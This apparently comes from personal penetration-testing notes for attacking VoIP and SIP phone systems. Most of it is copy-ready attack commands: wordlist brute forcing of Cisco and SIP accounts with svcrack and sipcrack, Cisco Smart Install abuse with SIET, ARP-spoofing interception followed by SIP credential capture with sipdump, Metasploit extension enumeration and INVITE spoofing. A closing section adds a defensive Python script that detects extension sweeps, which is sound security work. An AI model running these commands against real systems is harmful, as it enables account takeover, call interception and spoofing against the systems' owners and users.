- SNMP is enabled on many VOIP Devices; check for it
VOIP Protocols
- H.323 - Can initiate, authenticate, and end a request.
- Session Initiation Protocol (SIP) - ASCII protocol - request/response.
- Real-Time Transport Protocol (RTP) - After connecting via VOIP, RTP is used
- Secure Real-time Transport Protocol (SRTP)
#Nmap
nmap -O -P0 10.10.10.0/23
#Ports
UDP/TCP - 5060 & 5061
#Cisco SCCP Enabled ports
UDP/TCP - 2000-2001
#UDP or TCP - VXWORKS remote debugging
Port 17185
# cisco-audit-tool
CAT -h ip -p 2000 -w /usr/share/wordlists/rockyou.txt
# cisco-smart-install
https://github.com/Sab0tag3d/SIET/
sudo python siet.py -g -i 192.168.0.1
Enumeration
SIP - 'User Agent' & 'Server'
SIP phone Extensions (usernames)
TFTP Config files
SNMP Config
Using Netcat
nc 10.10.10.10 5060
> OPTIONS sip:test@10.10.10.10 SIP/2.0
SNMP
#-v takes the SNMP version (1 or 2c)
snmpwalk -c public -v 2c 10.10.10.10 1.3.6.1.4.1.6889
SIPVicious Github
python3 setup.py install
#Scan a set of IPs concurrently
for ip in $(cat "$1"); do sipvicious_svmap -p5060-5200 "$ip" & done
sipvicious_svmap 10.10.10.10 -p5060-5200
#Enum
sipvicious_svmap 10.10.10.10 -p5060-5200 -m INVITE
sipvicious_svwar udp://10.10.10.10:5070 -e100-500
sipvicious_svmap 192.168.1.1-254
sipvicious_svmap 192.168.1.1-254 --fp
#Extension Enum
svwar.py -e100-400 192.168.1.104
svwar.py -e100-400 192.168.1.104 -m INVITE -v
#svmap, send SIP OPTIONS
svmap -p5060,5061,5080-5090 10.0.0.1
#svcrack
svcrack -u100 -d dictionary.txt 10.0.0.1
#Capture the SIP Traffic
#arpspoof, sipdump & sipcrack are built into Kali
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t victim gateway
arpspoof -t gateway victim
Wireshark > not broadcast and not multicast and host <IP ADDRESS>
#Capturing SIP Authentication using SIPDump
sipdump -i eth0
sipdump -i eth0 auth.txt
sipdump -p /root/registration.pcap auth.txt
#Cracking response hashes
sipcrack -w sipass.txt auth.txt
#Bruteforcing SIP accounts using svcrack from SIPVicious
svcrack.py -u200 -d wordlist.txt 192.168.1.104
svcrack.py -u200 -r100000-999999 192.168.1.104
#Enum using Metasploit
#Scan for SIP Devices
use auxiliary/scanner/sip/options
#Enum SIP extensions/Usernames
use scanner/sip/enumerator
set RHOSTS 10.10.10.10
set MINEXT 100
set MAXEXT 500
set PADLEN 3
#Spoofing
use voip/sip_invite_spoof
might also try Responder
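#Detecting extension enumeration (added example)
From the defending side, the svwar and Metasploit extension sweeps above show up in SIP proxy logs or a capture as one source probing many extensions. The example below is added here and is not from the original notes or from SIPVicious; it flags such sources. The sample messages, addresses, the ExamplePhone agent string and the 20-extension threshold are constructed assumptions.

```python
import re
from collections import defaultdict

REQ_LINE = re.compile(r"^(OPTIONS|REGISTER|INVITE) sip:\S+ SIP/2\.0$")
TO_USER = re.compile(r"sips?:([^@>\s;]+)@")      # user part of the To URI = probed extension
SCANNER_UA = re.compile(r"friendly-scanner", re.I)  # SIPVicious default User-Agent

def parse_request(raw):
    """Return (method, extension or None, user_agent) for a SIP request, else None."""
    lines = raw.replace("\r\n", "\n").split("\n")
    m = REQ_LINE.match(lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        if not line:
            break  # blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    to = TO_USER.search(headers.get("to") or headers.get("t", ""))  # "t" is the compact form
    return m.group(1), (to.group(1) if to else None), headers.get("user-agent", "")

def find_enumerators(events, max_exts=20):
    """events: iterable of (src_ip, raw_request). Returns {src_ip: sorted reasons}."""
    exts, flagged = defaultdict(set), defaultdict(set)
    for src, raw in events:
        parsed = parse_request(raw)
        if parsed is None:
            continue
        _method, ext, ua = parsed
        if SCANNER_UA.search(ua):
            flagged[src].add("scanner-user-agent")
        if ext is not None:
            exts[src].add(ext)
            if len(exts[src]) > max_exts:  # one source touching many extensions
                flagged[src].add("extension-sweep")
    return {src: sorted(reasons) for src, reasons in flagged.items()}

def sample_events():
    """Constructed traffic: a phone re-registering, a sweep of 100-149, a monitor probe."""
    msg = ("{m} sip:10.10.10.10 SIP/2.0\r\nVia: SIP/2.0/UDP {s}:5060\r\n"
           "To: <sip:{e}@10.10.10.10>\r\nUser-Agent: {ua}\r\n\r\n")
    ev = [("192.168.1.50", msg.format(m="REGISTER", e="201", s="192.168.1.50", ua="ExamplePhone/1.0"))] * 5
    ev += [("192.168.1.66", msg.format(m="REGISTER", e=x, s="192.168.1.66", ua="friendly-scanner"))
           for x in range(100, 150)]
    ev.append(("192.168.1.77", "OPTIONS sip:10.10.10.10 SIP/2.0\r\nUser-Agent: monitor\r\n\r\n"))
    return ev

if __name__ == "__main__":
    print(find_enumerators(sample_events()))
```

The User-Agent match is a convenience signal only; the distinct-extension count is the check that holds when the agent string is different.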